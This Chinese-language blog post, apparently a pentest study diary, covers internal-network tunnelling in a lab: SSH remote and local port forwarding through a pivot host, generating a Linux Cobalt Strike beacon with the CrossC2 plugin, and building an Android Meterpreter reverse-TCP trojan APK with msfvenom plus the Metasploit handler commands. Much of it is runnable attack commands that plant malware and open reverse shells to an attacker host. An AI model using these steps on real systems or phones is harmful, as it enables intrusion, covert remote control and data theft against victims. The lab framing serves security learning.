当前位置:   article > 正文

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

目录

案例一:隧道技术-SSH 协议-判断&通讯&上线

linux跳板机远程转发

linux跳板机本地转发

案例二: 控制上线-插件-Linux&Mac&IOS&Android


这里dns隧道需要云服务器以及域名,就先不复现了,icmp和smb之前复现过

第123天:内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步-CSDN博客

第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线-CSDN博客

案例一:隧道技术-SSH 协议-判断&通讯&上线

环境搭建

 配置centos7,这里不用设置dns和网关

更新配置

win2019

确保两个都能ping通

现在配置防火墙,这里是iptables防火墙先不用了解,直接复制下面,即允许ssh隧道进行连接

  1. iptables -F
  2. iptables -A INPUT -p tcp --dport 22 -j ACCEPT
  3. iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
  4. iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
  5. iptables -A INPUT -p udp --sport 53 -j ACCEPT
  6. iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
  7. iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
  8. iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT
  9. iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
  10. iptables-save > /etc/sysconfig/iptables
  11. iptables -L

linux跳板机远程转发

利用条件:入站被限制,反向弹给攻击机

这里只是做实验,直接利用ssh进行连接,真实环境得从web到getshell

这里kali的ssh可能是某种策略无法被连接,临时换一台centos7备份(ip为147),建立ssh连接到跳板机

这里可以看到已经通过ssh切换了主机,执行下面的命令

  1. ssh -CfNg -R 攻击机的ip(随意):想通过跳板机连接主机的IP:80 root@攻击机的ip
  2. ssh -CfNg -R 1010:10.10.10.2:80 root@192.168.172.147

把win2019的80端口通过,被控主机(linux)反弹给攻击机(linux)

win2019的80端口页面

这个时候通过攻击机访问自己的1010端口

成功建立ssh隧道

linux跳板机本地转发

利用条件:出站被限制,需要走正向

其实本质没有什么区别就是通过把想要控制的主机转发给已经控制的主机,通过访问已经控制的主机,进行访问想要控制的主机

  1. ssh -CfNg -L 被控主机的ip(随意):想通过跳板机连接主机的IP:80 root@被控主机的ip
  2. ssh -CfNg -L 1122:10.10.10.2:80 root@192.168.172.133

ssh连接

把win2019的80端口转发到控制主机的1122端口,访问控制主机的1122端口就能访问80端口页面

案例二: 控制上线-插件-Linux&Mac&IOS&Android

项目背景:cs平台只支持windows平台的测试,不支持linux测试,该插件解决了这一问题

项目地址:Release v3.3 - stable · gloxec/CrossC2 · GitHub

这里cs也得符合版本,没有的话用这个

链接:https://pan.baidu.com/s/1eK_v_oilUnEWEWFHiieVYA?pwd=hadx
提取码:hadx

下载以后添加三个脚本模块

上方会出现一个crossc2

目前只支持https反向连接和tcp的正向连接

先创建一个监听器

生成反弹模块

生成以后会有一个日志出现

复制这句话替换掉前面的,用刚才下载的gencrossc2.linux进行执行,这里注意看下面的cs版本与你的cs是否符合不符合的话无法登录

把这个生成的t_cc2.out移动到被攻击主机,加执行权限执行

成功上线

mac这里没有环境不做复现

msf对安卓进行渗透,如果你的msf也是在虚拟机的kali,模拟器在真机当中,可以把模拟器和真机都设置为桥接模式,可以互相访问。

然后利用下面这个模块生成apk包

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=3333 R > apk.apk

msf开启监听

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost 0.0.0.0
  4. set lport 3333
  5. exploit

运行apk木马

直接上线

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号